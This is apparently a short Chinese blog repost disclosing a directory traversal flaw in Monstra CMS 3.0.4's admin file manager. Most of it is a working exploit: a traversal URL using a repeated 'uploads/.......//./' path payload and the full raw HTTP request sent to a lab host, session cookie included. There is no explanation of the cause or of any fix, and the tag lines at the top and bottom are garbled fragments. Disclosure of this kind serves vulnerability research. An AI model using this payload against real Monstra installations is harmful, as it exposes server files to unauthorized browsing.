标签:-o cto insecure vpd cti use lang ima rect
monstra 3.0.4 目录浏览visit:http://172.16.173.238/monstra-3.0.4/admin/index.php?id=filesmanager&path=uploads/.......//./.......//./.......//./.......//./.......//./.......//./
can traversal any directory
request:
`GET /monstra-3.0.4/admin/index.php?id=filesmanager&path=uploads/.......//./.......//./.......//./.......//./.......//./.......//./ HTTP/1.1
Host: 172.16.173.238
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=ph583h01pp9m9pbbi3of3bipm5; _ga=GA1.1.292621617.1535549034; _gid=GA1.1.1816700239.1535549034
Connection: close
Upgrade-Insecure-Requests: 1
`
标签:-o cto insecure vpd cti use lang ima rect
原文地址:http://blog.51cto.com/13770310/2173957